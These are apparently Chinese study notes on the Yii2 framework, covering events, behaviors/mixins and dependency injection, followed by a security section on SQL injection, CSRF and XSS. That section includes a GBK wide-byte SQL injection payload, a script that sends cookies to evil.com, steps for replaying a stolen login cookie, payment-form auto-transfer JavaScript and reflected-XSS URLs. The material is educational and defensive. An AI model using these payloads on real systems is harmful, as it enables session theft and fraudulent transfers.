run() 方法是在应用主体中被定义的方法：(/path/to/vendor/yiisoft/yii2/base/Application.php)

``` php
/**
* Runs the application.
* This is the main entrance of an application.
* @return integer the exit status (0 means normal, non-zero values mean abnormal) */
public function run()
{
try {
	$this->state = self::STATE_BEFORE_REQUEST;
  	$this->trigger(self::EVENT_BEFORE_REQUEST);
	$this->state = self::STATE_HANDLING_REQUEST;
  	$response = $this->handleRequest($this->getRequest());
    $this->state = self::STATE_AFTER_REQUEST;
  	$this->trigger(self::EVENT_AFTER_REQUEST);
    $this->state = self::STATE_SENDING_RESPONSE;
  	$response->send();
    $this->state = self::STATE_END;
	return $response->exitStatus;
} catch (ExitException $e) {
	$this->end($e->statusCode, isset($response) ? $response : null);
  	return $e->statusCode;
} }
```

run() 方法中注册了 2 个事件，事件 ID 分别是 `self::EVENT_BEFORE_REQUEST` 和 `self::EVENT_AFTER_REQUEST`，这两个 ID 在类 Application 中其实代表的是成员常量 beforeRequest 和 afterRequest。

handleRequest() 将用于处理交给 Application 类实例的请求，而 `\YII::$app` 就这是这么一个实 例，它将处理所有交给 YII 应用主体的任务，并在处理结束之后触发事件 EVENT_AFTER_REQUEST 。等待着其他对象的方法对该事件进行绑定，或者正在监听该事件的方法去完成一些事情。

可以简单测试一下第二个事件能否被绑定给项目中任何位置的程序：

``` php
namespace app\controllers ;
use yii\web\Controller ;
use \yii\base\Event ;
  
class AnimalController extends Controller
{
  public function actionIndex() {
	\YII::$app->on( \yii\base\Application::EVENT_AFTER_REQUEST, function() {
      echo '2. EVENT_AFTER_REQUEST <br>' ;
	});
	echo '1. EVENT_BEFORE_REQUEST <br>' ;
  }
}
```

浏览器会打印两个结果。

可以看出，事件 `yii\base\Application::EVENT_AFTER_REQUEST`成功绑定给控制器 Animal 的 Index 操作中的一个匿名函数。这个测试证明了，Yii 的应用主体 `\YII::$app` 中也实现了事件机制，事先注册了可以绑定给项目中任何位 置的程序的事件，当绑定到该事件的程序监听到之后就可以完成不同的功能。

#### 为什么说事件机制提高了 YII 的扩展性?

由于 YII 的应用主体 `\YII::$app` 是一个单例模式的对象实例，被 YII 框架下的所有程序所共享。`\YII::$app` 在 YII 框架中充当了主线逻辑，在主逻辑不被更改的情况下，通过这个应用主体可以触发各种 各样的事件，而这些事件又会被一些需要的对象所捕获， 然后进行相应的处理。

这样的好处是，可以在不改动原来的主程序、主逻辑的前提下，通过这些事件去完成各种各样的操，使 Yii 更加灵活应付复杂多变的需求。

### Mixin

一种混合的方式，类似多重继承。可以在不改变父类的基础上，为父类和其对象动态地注入属性和方法，从而  使得父类和对象具有了后天学习的能力。 

在程序环境比较复杂，原有的类和实例对象中方法不够用的情况下，相应的类和对象可以向一些行为类进行学  习，从而获得行为类的部分属性和方法，以应对复杂的程序环境。

> 混合就像做化学实验，通过几种化学物质经过化学反应可以生成新的化合物，拥有了新的特征与功能。

扩展 Yii 项目功能完全可以通过让类和对象自学习的形式去实现。

YII 是通过一种叫做「行为」的方式去实现 mixin 的。Yii 主要有如下两种混合：

#### 类的混合

类的混合指的是若干个类通过混合后的及各类可以生成一个新类。

类会被注入多个行为类中的所有非私有、非保护的成员属性和方法。最终效果类似于 C++ 中的多重继承。但是并不是真的继承，继承中 protected 修饰的成员子类可以 访问，但是通过注入的方式获得的新类却无法访问 protected 修饰的成员。举例说明：

- /path/to/basic/behaviors/Behavior1.php

``` php
namespace app\behaviors ; // app 代表 basic 目录，behaviors 文件夹是我们手动创建的
use yii\base\Behavior ; // 只有继承了 Behavior 的类才能具有行为特征，才能实现 minxin

class Behavior1 extends Behavior
{
	# 由于通过 mixin 方式将属性和方法注入给其他类不同于继承，所以注入的类中 portected 修饰的成员无法被 被注入类访问
	protected $height ; // 如果用 protected 或者 private 修饰属性, mixin 过去的类将无法访问该属性, 只能注入 public 修饰的成员
	public function eat() {
		echo 'I want bones.<br>' ;
	}
    # 方法名 events 具有特殊含义, 不能随便定义
    # events() 方法用于接收从被注入类中返回的事件, 用以告诉本行为类接受什么样的事件，然后触发什么样的方法
	public function events() {
      return [
        'wang' => 'shout'
		// 将事件 wang 绑定到方法 shout()
      ];
    }
	public function shout() {
	  echo 'wang~wang~wang~<br>' ;
	} 
}
```

- /path/to/basic/vendor/animal/Dog.php

``` php
namespace vendor\animal;
use app\behaviors\Behavior1;
use yii\base\Component;// YII 中一个类要想实现行为的属性和方法必须先继承 Component 类;
// 此外，Component 类还具有让一个类拥有处理事件的能力，比如 trigger() 和 on() 等事件机制中的方法

class Dog extends Component
{
	# behaviors() 方法的作用是将 Behavior1 类中非私有、非保护的行为和方法注入到本类
    # 方法名 behaviors 具有特殊含义
    public function behaviors() {
    # 返回(注入)指定的行为类的方法和属性给本类; 之所以用数组是因为不仅可以返回 Behavior1 这一个类的 方法和属性，还可以返回更多行为类的方法和属性
      return [
        Behavior1::className()
        类名
    	];
    }
    public function look () {
      // className() 方法将返回类 Behavir1 的全名，全名是指包括命名空间和
      echo 'DOG: Shut up , bitch cat.<br>' ;
	}
}
```

- /path/to/basic/controllers/AnimalController.php

``` php
namespace app\controllers ;
use yii\web\Controller ;
use \yii\base\Event;
use vendor\animal\Dog ;

class AnimalController extends Controller
{
  public function actionIndex() {
    $dog = new Dog() ;
    $dog->trigger( 'wang' );
    $dog->look() ;
    $dog->eat() ;
    // echo $dog -> height = 10 ; // 由于行为类 Behavior1 的属性是 protected 修饰的所以这里无法访问
  }
}
```

访问 `r=animal/index` 后输出：

``` 
wang~wang~wang~
DOG: Shut up, bitch cat.
I want bones.
```

关于本例需要说明的有如下几点：

- 只有继承了 Behavior 的类才能具有行为特征，才能实现 minxin。
- 由于通过 mixin 方式将属性和方法注入给其他类不同于继承，所以注入的类中 portected 修饰的成员无法被被注入类访问。
- 方法名 events 具有特殊含义, 不能随便定义; events() 方法用于接收从被注入类中返回的事件, 用以告诉本行为类接 受什么样的事件，然后触发什么样的方法。
- Yii 中一个类要想实现行为的属性和方法必须先继承 Component 类。此外，Component 类还具有让一个类拥有处理事件的能力，比如 trigger() 和 on() 等事件机制中的方法。
- 同 events()，方法名 behaviors 也具有特殊含义。behaviors() 方法的作用是将指定的行为类，这里是 Behavior1 类， 中非私有、非保护的行为和方法注入到本类。之所以用数组是因为不仅可以返回 Behavior1 这一个类的方法和属性，还可以返回更多行为类的方法和属性。

#### 对象的混合

某个对象被实例化出来过后如果发现方法或者属性不够用的时候，以往的做法就是修改类文件，新增需要的属性和 方法，但是这样做会给其他并不需要新属性和新方法的对象带来不同程度的影响，为了兼顾两者，Yii 提供了对象混合的机制，可以为需要新增属性和方法的对象注入相应的属性和方法完成需求。

举例说明：

- /path/to/basic/behaviors/Behavior1.php

``` php
namespace app\behaviors;
use yii\base\Behavior;

class Behavior1 extends Behavior
{
  public function eat() {
	  echo 'I want bones.<br>' ;
  }
}
```

- /path/to/basic/vendor/animal/Dog.php

``` php
namespace vendor\animal ;
use yii\base\Component ;

class Dog extends Component
{
  public function look () {
	echo 'DOG: Shut up , bitch cat.<br>' ;
  }
}
```

- /path/to/basic/controllers/AnimaController.php

``` php
namespace app\controllers ;
use yii\web\Controller ;
use \yii\base\Event ;
use vendor\animal\Dog ;
use app\behaviors\Behavior1 ;

class AnimalController extends Controller
{
  public function actionIndex() {
    $dog = new Dog() ;
	$behavior1 = new Behavior1();
	$dog->attachBehavior( 'bhv1', $behavior1 ) ; // 为 Dog 类对象 $dog 附加行为类对象 $behavior1 中的属性和方法
	// $dog -> detachBehavior( 'bhv1', $behavior1 ) ; // 从 Dog 类对象 $dog 上面移除行为类对象 $behavior1 中的属性和方法
	$dog->eat();
  }
}
```

访问 `r=animal/index` 后输出：

``` 
I want bones.
```

通过在对象之间附加属性和方法的方式，可以根据需要很方便地为某个对象增加新属性和新方法。

#### 为什么说 Mixin 机制提高了 YII 的扩展性？

不可能每个类或对象的属性、方法都能随时满足需求的变化，但重写类、新建类不仅加重编码工作量，也会出现很多重复的代码，这都是不可取的。

通过 Mixin 提供的行为机制，可以很灵活地位为某个类增加行为和属性，并将影响带给其所有实例。

通过对象的混合，也可以很灵活地为某个实例附加或者移除属性和方法。这种机制也使得 Yii 框架能更灵活地处理复杂多 变的需求。Yii 项目中功能的增减可以通过 Minxin 的方式灵活方便地实现，当然提高了 Yii 的扩展性。

### 依赖注入

一种设计模式，又被称为控制反转。

依赖注入可以降低类之间的耦合度，从而提高类的复用性，可一定程度上提高 Yii 框架的可扩展性。

扩展 Yii 项目功能完全可以通过降低类之间的强依赖的方式去实现，因为一个类的对其他类的依赖降低，该类 将更容易能做到更多的事情，而不再受限于其他类的变化。

#### 为什么需要？

为了解决类与类之间的耦合问题。

强耦合体现在哪些地方？类与类互相制约。

因此在类中尽量不要实例化另一个类，因为会使本类的功能会受到该类的制约。举例说明：

``` php
class Customer {
  public function searchByDirector( $director ) {
    $handler = new MovieFinder() ;
    $movies = $handler -> findAll() ;
    $res = array() ;
    foreach( $movies as $movie ) {
      if( $movie -> getDirector() == $director ) {
        $res[] = $movie;
      }
    }
    return $res ;
  }
}
```

这个例子当中，类 Customer 中的 searchByDirector() 方法的功能收到了类 MoviewFinder() 的制约，导 致该方法只能查询电影，而如果要查询其他内容该方法则无法实现，就导致类 Customer 的功能比较 弱。

解耦和的方式之一就是把算法和数据结构剥离，然后重新组织程序结构。比如，将一个类的实例化结果作为一个参数传递给另一个类中的方法，这样就可以根据参数的不同而执行不同的业务。

将上面的例子改为：

``` php
class Customer
{
  public function searchByDirector($director, $handler) {
  	$movies = $handler -> findAll() ;
    $res = array() ;
    foreach( $movies as $movie ) {
      if( $movie -> getDirector() == $director ) {
        $res[] = $movie ;
      }
    }
    return $res;
  }
}
```

现在的 searchByDirector() 方法不仅可以查询电影，还可以查询很多内容，这完全取决于传递给它的参数 $handler 代表了什么。

在公式 “程序 = 算法 + 数据结构” 中，算法理应是通用的，而数据结构是具体的事物。对于一个函数/ 方法来说，应该最好是只体现算法，即解决问题的一系列步骤，而参数可以看作是数据结构，是具体要完成的业务的承载体，实际上也就是数据结构，因为 `$handler ` 可以是对象，可以是数组，对应于数据结构中的线性表、堆和栈等概念。

虽然算法中最终参与计算的是数据结构和数据这些实实在在的东西，但是应该和数据结构独立开来，达到依赖于数据结构但是不受限于数据结构。这样程序的可复用性会提高很多。上面的例子就是一个证明。

Yii 中实现依赖注入的两种方式：容器和服务器定位。

#### Yii 容器

Yii 中的容器为我们自动地解决了类和类之间的依赖关系。

- /path/to/basic/controllers/DependencyController.php

``` php
namespace app\controllers ;
use yii\web\Controller ;
use yii\di\Container ; // 容器类 Container 所在命名空间

class DependencyController extends Controller
{
  public function actionIndex() {
    # 实例化一个容器对象，用容器类中的 set() / get() 方法去解决其他类之间的依赖关系
    $container = new Container() ;
    
    # 容器类中的 set() 方法用于将接口 Driver 和实现该接口的 ManDriver 关联起来, 否则会 因接口不能被实例化而执行失败

  	$container->set('app\controllers\Driver', 'app\controllers\ManDriver'); // 这句话 的意思是，如果发现使用 get() 方法实例化对象时候类 Car 的构造函数需要的参数类型是 Driver 接口类型，就去用 ManDriver 类去替代接口完成对参数对象的实例化
  	# 这里执行 get() 方法相当于执行了 $driver = new ManDriver; 和 $car = new Car( $driver );
    
    $car = $container->get( 'app\controllers\Car');   // 同 set(), get() 方法中也需要填写完整的命名空间 而不能只写类名，否则会报错
    $car->run();
  }
}

# 定义该接口的目的是为了消除类 Car 和类 ManDriver 之间的强依赖 interface Driver
{
	public function drive();
}

class ManDriver implements Driver
{
  public function drive()
  {
	echo 'I am your private driver, sir.' ;
  }
}

class Car
{
  private $driver = null ;
  # 虽然通过传递 ManDriver 类型的 $driver 参数给构造函数在这里也能正常运行，但是 ManDriver 和 Car 两个类仍然是强依赖关系，所以要借助容器类中的方法解决强依赖问题
  # 上面已经用容器类中的 set() 方法将 Driver 接口和 ManDriver 类关联起来，已经替我们解决 了接口不能被实例化的问题
  # 这里通过接口类型定义的 $driver 参数有点类似于 C++/Java 中的泛型
  public function __construct(Driver $driver) {
  	$this->driver = $driver ;
  }
   # 类中成员方法需要的参数一般不直接写在方法当中而是保存在类的成员属性中，然后在方法体内直接被调用，这些成员属性一般通过构造函数被赋值
  public function run() {
    $this->driver->drive() ;
  }
}
```

执行后输出为：

``` php
I am your private driver, sir.
```

上面的例子中，明明可以直接把 ManDriver 类的实例作为参数传递给 Car 类的 run() 方法解决强依赖问题，为什么还要使用容器来解决依赖？

容器不仅可以解决类之间的强依赖，而且是能够更轻松地通过配置文件的形式解决强依赖。预先定义好类之间的依赖关系，然后通过读取配置文件自动找到所需的依赖而不用像直接把参数传递给 run() 方法那样每次调用都需要传递一个依赖的对象作为参数。

这样在类文件非常多的时候，就可以将每个类之间的依赖关系保存到配置文件当中，然后交给容器类读取，然后自动批量解决类之间的依赖关系，以后在程序中使用方法的时候就无再需操心依赖关系了。这是每次都给函数传递参数的形式所比不上的地方。

#### Yii 服务定位器

服务定位器是依赖于容器之上的。服务定位器会把参数信息传递给容器，容器会根据这些参数信息去实例化服务类，当实例化服务类的同时就会自动解决类之间的依赖关系。
容器的主要任务是定义并解决依赖关系。服务定位器的主要任务是配置程序中所需服务的参数信息。

举例说明，仍然是上面中的例子，将上面例子中的 Car 类升级成服务类，并将其依赖的关系信息配置到 basic/config/web.php 中的 component 键当中，需要改动的只是 DependencyController 类以及引入服务定位器类所在的命名空间即可。具体代码如下：

-  第一阶段：简单使用服务定位器和容器

``` php
namespace app\controllers;
use yii\web\Controller;
use yii\di\Container;
use yii\di\ServiceLocator;

class DependencyController extends Controller
{
  	public function actionIndex() {
      # 全局容器 \YII::$container 的 set() 方法和 yii\di\Container 类的 set() 方法作用相同
      \YII::$container -> set( 'app\controllers\Driver', 'app\controllers\ManDriver' ) ;
      $sl = new ServiceLocator ;
      $sl -> set('car', [
      	'class' => 'app\controllers\Car'
      ]);
      $car = $sl -> get( 'car' ) ;
      $car -> run() ;
	}
}
```

- 第二阶段：将依赖配置到文件 web.php，升级 Car 为服务类，使 Car 类成为应用主体 `\YII::$app` 的一个组件/属性

``` php
namespace app\controllers ;
use yii\web\Controller ;
use yii\di\Container ;
// use yii\di\ServiceLocator ;

class DependencyController extends Controller
{
  public function actionIndex() {
    \YII::$container -> set( 'app\controllers\Driver', 'app\controllers\ManDriver' ) ;
    \YII::$app -> car -> run() ; // 这里之所以能这样调用是因为在 web.php 中已经将 Car 类 配置成应用主体 $app 的一个组件了
    // $sl = new ServiceLocator;
    
    # 将下面的配置到 basic/config/web.php 的 component 键中
    // $sl -> set( 'car', [
    // 	'class' => 'app\controllers\Car'
    // ] ) ;
    // $car = $sl -> get( 'car' ) ;
    // $car -> run() ;
  }
}
```

- /path/to/basic/config/web.php

``` php
// 往 component 键中加入
'car' => [
	'class' => 'app\controllers\Car'
],
```

可见，第一阶段和第二阶段的效果在浏览器端都是一样的，也和容器中那个例子输出一样的结果。  但是，其中具体的实现却是不同的。

第一阶段的实现方式和 web.php 没有关系，因此不能直接通过应用主体 `$app` 去直接调用类 Car 的 run() 方法。但是两个阶段的 set() 方法实际都是通过容器类完成的。

将类和类依赖注册到配置到应用主体的配置信息 web.php 中是服务定位器的特点，也增强了 Yii 的 扩展性。

#### 为什么说依赖注入提高了 Yii 的扩展性？

容器将类与类之间的依赖关系从类中剥离出来，而服务定位器将类所需要的参数信息提取出来写入到配 置文件，两者都是的 YII 框架中程序关系更加松散，耦合性更低，从而提升了类的可复用性，也方便程序的维护和扩展。

此外，在上面第二阶段的例子中，通过将类的参数信息配置到应用主体的配置文件 web.php 中去，由于 `\YII::$app` 的实例化会通过读取 config/web.php 来决定其实例化之后有多少功能，之后就可以在程序中 的任何位置通过应用主体调用配置文件中配置过的某个类的方法。就像把你自己写的类作为 Yii 应用主体的一个属性直接调用，即升级为服务类。

这么一来，你需要有多少类需要添加到项目，就可以直接按照同样的方式把你写的类，即功能添加到 Yii 框架的应用主体对象中去被直接调用，在调用的这些类的 同时，`\YII::$app` 会先让容器类自动加载并解决掉类之间的依赖，这对于 Yii 框架的功能扩展和灵活处理需求变化来说都是有帮助的。

## 安全

### SQL 注入

通过绕过设计者的意图，向表单或者 URL 中嵌入一段别有用途的 SQL 语句，并利用服务器端程序的安全漏洞进入数据库执行引擎成功获得执行，得到本无权访问的数据的的攻击方式。

具体指的是浏览器传递到服务器上的 sql 语句组成元素并不是寻常的字符串，而是一些有特殊含义的 sql 语法。

比如：服务器端组织的 sql 语句是：

```php
$sql = 'select * from table_name where id='.$id ;
```

原本需要传递给服务器的 sql 组成部分应该是 `id=1;`  而实际传递到服务器上的 sql 组成部分确是 `id=1 or 1=1;` 。如果服务器上不进行相应的检测，那么组成的 sql 语句会查询到表中的所有数据，造成数据泄露的风险。

SQL 注入的关键在于对 SQL 语法的利用，比如注释 `—`，比如逻辑比较 `or`、`||`，从而达到绕过本应正常执行的 SQL，从而提权。

#### 防范 SQL 注入的常见措施

- 屏蔽敏感词（or 等）

但是实际上并不靠谱，因为实际中确实需要 or 来帮助查询。

-  对引号进行转义。举例说明：

``` php
//header( "Content-type:text/html; charset=utf-8" ) ;
header( "Content-type:text/html; charset=gbk" ) ;
// chr() 返回 oxdf 对应的 ASCII 码 当中的字母，即 β
$key=chr(0xdf)."'||1=1--"; //β'||1=1--
// β' => df27
$key = addslashes( $key ) ; // β\' || 1=1 --
// β\' => df5c27
echo $key ;
$sql = "select * from articles where score<60 and title like '%'.$key.'%'" ;
mysql_query( "set names gbk" ) ;
mysql_query( $sql ) ;
```

浏览器在解析数据的时候是按照不同的编码方式来解析的，每个字符在以某种编码方式输出出来之前都已经经过编码成十六进制的 ASCII 码，也就是上面的 `df(β)`、`5c (\)`、`27 (')`。

浏览器和服务器之间传递数据的时候，其实也是按照 ASCII 码传递的，传递到浏览器后，才会按照不同的编码方式进行解析。一个字符占一个字节，GBK 的编码方式使用的是 2 个字节编码一个中文，因此如果 mysql 采用的是 gbk 的编码方式的，那么 最终到 MySQL 数据库的时候 df5c27 会被解析成 df5c 27，即经过 GBK 编码后的字符串 `$key` 是有一个中文字符 `運`，而 27 代表的字符是 `'`，因此 最终进入 MySQL 的字符串是：

``` sql
select * from articles where score<60 and title like '%運' || 1=1 --%';
```

可见，SQL 注入也是成功的。

#### Yii 对 SQL 注入的防范

主要是通过 PDO 中的占位符机制。

``` php
namespace app\controllers;
use yii\web\Controller;
        
class PdoController extends Controller
{
  public function actionPdo() {
	$user = ( new \yii\db\Query())->select('*')
    ->from('users')
    ->where('name=:name', [ ':name' => 'cjli' ])
    ->one();
  }
}

```

同时，basic/config/db.php 中的 `emulatePrepare` 要为 `false`。

其中， emulatePrepare 的值代表了对查询条件字段中值的转义是发生在 PHP 还是在 MySQL。

false 代表在 MySQL 端才进行转义。当为 false 的时候，PHP 这边执行上述代码 的时候会将上面的 SQL 语句分成两部分。

- `select * from users where name=?`
- `cjli`：占位符所对应的值。

当占位符所对应的值进入 MySQL 之后会对其进行转义，如果值里面有分号 `'`，MySQL 就会 对其进行转义成 `\'`。（其中 `?` 也是一种占位符）

#### WirShark

可以抓取 PHP 和 MySQL 之间发送的数据包，查看是否进行了 2 次转换：

- Prepare Statement
- Excute Statement

### CSRF

Cross Site Request Forgery，跨站请求伪造。伪造合法用户身份发起非合法用户意愿或没有经过合法用户授权的操作。或称 XSRF。

#### GET 型 CSRF 攻击

传递参数的形式是通过 URL。攻击者事先伪造好了一个具有特殊意义参数的的 URL 地址，给其他用户访问，比如某银行转账的一些常见参数，当其他用户访问该链接后，很可能由于被攻击者已经登录该银行的网站，因此就会自动进行相应的转账操作。

总结：GET 请求更容易遭到 CSRF 攻击。

#### POST 型 CSRF 攻击

在已登录用户提交表单的过程中，设法诱导该用户来到伪造的表单控件。伪造的表单控件中我们事先伪造好了一些表单数据，当用户点击我们伪造的表单的时候，我们就可以借用 该合法用户的身份向服务器发起请求完成一些事情了。

#### CSRF 防范

- 验证码

但是如果每次提交表单的时候都需要填写验证码多少会影响用户体验。

- 通过请求当中的 Referer 头验证

浏览器的请求头中会有一个 Referer 字段，记录了每次请求是从哪里发出的，通过判断请求来源来判断是否受到 CSRF 攻击。 但是不是每次请求都会带上 Referer 头。

- 防伪标识

服务器会对比随机响应回去的防伪标识数据和浏览器返回的防伪标记是否一致，比如随机更改表单控件的 name 和 value 字段的值，如果响应和请求中防伪数据都一致则认为是合法表单提交请求。

由于防伪标记是服务器随机分配的，所以比较难以猜测，Wordpress 中就采用了这种机制。

##### Yii 中如何防范 CSRF

默认 Yii 就开启了 CSRF 防范策略：

- basic/controllers/HelloController.php

``` php
namespace app\controllers ;
use yii\web\Controller ;

class HelloController extends Controller
{
  public function actionCsrf() {
	return $this -> renderPartial( 'csrf' );
  }
}
```

- basic/view/hello/csrf.php

``` html
<form method="post">
  <input type="text" name="title" value='Hello CSRF'>
  <input type="submit" value="提交">
</form>
```

说明：form 表达中如果不指定 action，那么响应的操作脚本默认就是提交该表单的当前脚本。

当访问 `r=hello/csrf` 的时候，点击提交会出现如下警告：

``` html
Bad Request(#400
Unable to verify you date submission.
```

这就是因为 Yii 中开启了 CSRF。

可以通过如下修改通过 Yii 的 CSRF 验证：

- HelloController.php

``` php
namespace app\controllers;
use yii\web\Controller;

class HelloController extends Controller {
  public function actionCsrf() {
    if ( \YII::$app->request->isPost) {
      echo \YII::$app->request->post('title');
    } else {
      $csrfToken = \YII::$app->request->csrfToken;
      return $this->renderPartial(
        'csrf',
        [ 'csrfToken' => $csrfToken
      ]);
    }
  }
}
```

- csrf.php

``` html
<form method="post">
  <input type="text" name="title" value='Hello CSRF'>
  <input type="hidden" name="_csrf" value="<?=$csrfToken;?>">
  <input type="submit" value="提交">
</form>
```

然后再次刷新页面，就不会再出现该错误提示了。

##### Yii 验证 CSRF 攻击流程

之所以会经过这么一个过程是跟 YII 的验证方式有关。

YII 中对 CSRF 的校验是通过在服务器端校验提交表单值 name 为 _csrf 字段的值来实现的。即 `$csrfToken = \YII::$app -> request -> csrfToken ;` 这段代码所起到的作用。

因为我们在浏览器中是通过 URL 的形式传递参数来访问控制器中的操作的，当浏览器以 Get 方式访问控制器中的 Csrf 操作的时候，在上面的例子中将执行 else 里面的代码，即通过 request 请求组件中的 csrfToken 属性生成一个 csrf 校验字符串，然后在响应浏览器的时候将其写到表单中 name 为 _csrf 的 input 控件中一起返回给浏览器。（可以在审查元素中看到该 _csrf 的值）

当浏览器再次通过该表单对服务器发起请求的时候，就会将这段 _csrf 值一并发送到服务器用以校验，但是 Yii 应用的服务器端存储 csrfToken 的位置并不在服务器上，而是加密过后存储在浏览器的 Cookie 当中，这样是为了减轻服务器的压力。也就是说，浏览器通过表单向浏览器发起请求的时候，发送了 2 个 csrf 值，一个位于加密后的 Cookie 中，一个位于未加密的表单中控件中。

这样当服务器解密 Cookie 中的 _csrf 值和表单控件中的 _csrf 值校验成功后，一次 csrf 请求校验就认为成功，除非攻击者知道服务器端的加密算法，否则很难获得该 csrf 值。

### XSS

Cross Site Scripting 。之所以叫 XSS 是为了与前端当中的 CSS 区分开来。

XSS 是属于 WEB 应用的安全漏洞之一。其表现是在其他用户使用的页面中嵌入一些不友好的 HTML 代码，从而进行攻击。比如:盗号、非法转账、篡改系统信息、网站挂马。

举一个很简 单是例子，在 Wordpress 中以文本形式新建一篇文章时填写如下文本：

``` 
xss test. <script>alert('xss')</script>
```

发布后，访问该文章页面，就会弹出 'xss' 窗口。这就是最简单的一次 XSS 攻击实例。

#### 盗号

如果嵌入的 JS 代码别有用意，比如：

``` javascript
var cookie = document.cookie ;
window.location.href = "http://evil.com/index.php?cookie=" + cookie ;
```

然后当我们访问这篇博客文章的时候，却发现页面跳转了。

很明显，不仅页面发生了跳转，同时还把从 Wordpress 站点中的 Cookie 值也夹带传给了新站点。

由于 Wordpress 站点已经登录了用户，所以其实用户的登录信息也被盗走了。具体的 Cookie 信息可以 Wordpress 站点里用审查元素工具中看到。

#### 从用户登录过程到 Cookie 与 Session 的工作原理

在某个合法用户使用账户和密码登陆网站的时候，服务器会根据用户提交的合法信息进行 安全校验，如果通过校验就为该合法用户生成一个 Session 文件，里面就保存了该用户登 录的一些状态信息。

该 Session 文件名是由服务器经过一定的转换的字符串，当服务器响应该合法用户的请求 的时候，会把该 Session 文件名放到响应头当中，当浏览器收到服务器的响应的时候，就 会把服务器传给它的 Session 名保存在浏览器本地 Cookie 当中，当下次对服务器发起请求 的时候，就会带上该 Cookie 一并发给服务器，于是服务器就会根据发送过来的 Cookie 反 过来查找对应 Session 文件，从而识别出是哪个用户发出的请求。

那么当有非法用户获得了合法用户的 Cookie 数据的时候，就可以模拟合法用户带上该 Cookie 向服务器发出请求，如果服务器没有采取其他安全措施，该非法用户就可以实现伪 装合法用户身份进行登录，然后对系统进行一些操作，即实现了盗号。

#### 盗取 Cookie 实现非法登录

假设已经拿到已登录的合法用户 cjli 的浏览器 Cookie 值，为：(可以在请求头的 Cookie 字段中获得)

```
wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=cjli%7C145054 5217%7CralvIEsHZlBwfQ6RxBYeF5vvzz6dexhjv4SIC7o9Gjv%7C5a364a6d69113772e1148 afd37f381d69e3a2f9b1fbc2002c33c841ac477a9de;
```

在另一个浏览器中，比如 IE，访问 `http://localhost/wordpress/`，即可以访客身份访问合法 Wordpress 用户的首页，按 F12 进入开发者模式，进入控制台，执行：

```javascript
document.cookie = "wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=cjli%7C14505 45217%7CralvIEsHZlBwfQ6RxBYeF5vvzz6dexhjv4SIC7o9Gjv%7C5a364a6d69113772e114 8afd37f381d69e3a2f9b1fbc2002c33c841ac477a9de;" ;
```

然后刷新这个首页，可以发现，在 IE 中我们跳过登录验证直接使用合法用户的 Cookie 实
现了登录。

##### 为什么在 cookie.txt 中无法保存登录信息的 Cookie?

打开审查元素，重新来一次登录过程，在 Network 网络监控工具中查看浏览器和服务器在登录过程中交互了哪些数据。打开第一条，即 wp-login/index.php 脚本的 HTTP 事务详情，在响应头的多条 Set-Cookie 字段中，可以发现有的字段值后面有 httponly 标志，而有的有没有，其中保存登录信息的 Cookie 后面就有该标识。

##### httponly

为了解决 xss 问题，微软在 IE6 之后的 IE 浏览器中新增了 httponly 机制，只要服务器端在向浏览器发送 Cookie 的时候为 Cookie 标记了 httponly，那么浏览器本地就不能通过 Javascript 获得该 Cookie 值。而没有标记 httponly 的 Cookie 可以被 document.cookie 代码读取到。

httponly 在一定程度上解决 xss 攻击，因为 xss 攻击的重点就是使用 Javascript 来获得浏览器中的 Cookie 从而实现盗号。

#### 非法转账

以支付宝转账界面为例说明：

- 自动填写转帐信息 Javascript 代码

``` javascript
document.getElementById('ipt-search-key').value = 'test@test.com'; document.getElementById('amount').value = 100;
document.getElementById('reason').value = 'fky';
document.getElementsByClassName('ui-button-text')[0].click() ;

```

- 后台注入

  - 反射型 XSS

  ``` html
  <!-- 构建非法链接，并插入文章中 -->
  <a href="http://localhost/basic/web/index.php?r=hello/index&key=
  <script>alert(1024)</script>">点我有惊喜</a>
  ```

  本地环境测试没有问题，但是支付宝中这么干的话 JS 代码会被服务器编码处理成一个无害的字符串返回给浏览器，因此并不会出现我们想要的结果。

  在审查元素中的 Elements 选项中，搜索 URL，看看我们的 JS 代码段被转换成何种类型，然后针对性让 JS 代码从字符串中越狱执行。此外，在转账页面的源代码中可以发现，我们 URL 中的 `<script>` 标签其实是不必要的，因为源码中 alert() 外面已经有了。所以可以把我们的 URL 简化成只需要传递 `alert( 1024 )` 给浏览器执行就行了。

- HTML 实体名称与实体编号

``` 
双引号 ":&quot; 或者 &#34;
单引号 ' :&apos; 或者 &#39;
```

`#` 号后面的是 ASCII 码。注意：HTML 实体编码不能在 javascript 中生效。

- 如何使用参数传递 `&quot`？

访问：`http://localhost/test.php?key=&quot;`

``` php
echo $_GET['key'];
```

而 `&` 在 URL 已经具有特殊含义，所以上面的 URL 地址得到的结果为空。因为 `key=&quot` 这段代码在服务器看来是 key 值为空，同时 quot 的值也为空。所以返回空给浏览器。

解决的办法，需要使用到 URL 编码。

- URL 编码：`& -> %26`。

同样的效果还可以通过 Javascript 的 `escape()` 函数编码一些字符。比如 `&`。

```javascript
document.write(escape('&')) ;     // 结果是 %26
```

但是，在支付宝支付界面这样传递 `&` 参数却被服务器原样输出，我们 URL 中的 JS 代码还是没有得到执行。

- 嵌入图片当中的 JS 代码

```
http://localhost/test.php?key=%26quot;;alert(1024);

<img src='x' onerror='var a = "123<?=$_GET[ 'key' ];?>";'>
```

可以发现，浏览器终于弹出了 1024。

这个例子说明了，浏览器只能防范比较简单的 XSS 攻击代码，而对于伪装得比较好的 JS 代码，目前的浏览器也是无能为力。

#### 反射型 XSS

在浏览器地址栏中如果这样组织 URL：`http://localhost/basic/web/index.php?r=hello/index&key=<script>alert("rxss")</script>` ，如果回车后浏览器会出现 rxss 弹窗就认为反射型 XSS 攻击成功。

但是一般的浏览器都会过滤掉类似上面的写法，因为分析出了 URL 里面含有 Javascript 代 码。可以在审查元素控制台中看见报错。

根据报错提示，在 HelloController.php 中关闭浏览器的 XSS 防护措施，可以发现 XSS 攻击再次成功。

``` php
\YII::$app->response->headers->add('X-XSS-Protection', '0');
echo \YII::$app->request->get('key');
```

#### XSS 蠕虫

蠕虫是一种计算机病毒的统称，代表的是一种具有传播特点的病毒。

XSS 蠕虫指的就是可以大规模地进行 XSS 攻击的一段 Web 代码。

#### Yii 中如何防范 XSS

-  转码防范（ HTML 实体编码）。相关的类文件是：

  - basic/vendor/yiisoft/yii2/helpers/BaseHtml.php

  该类中使用了 htmlspecialchars() PHP 方法，将字符串进行实体编码。

  - basic/vendor/yiisoft/yii2/helpers/Html.php

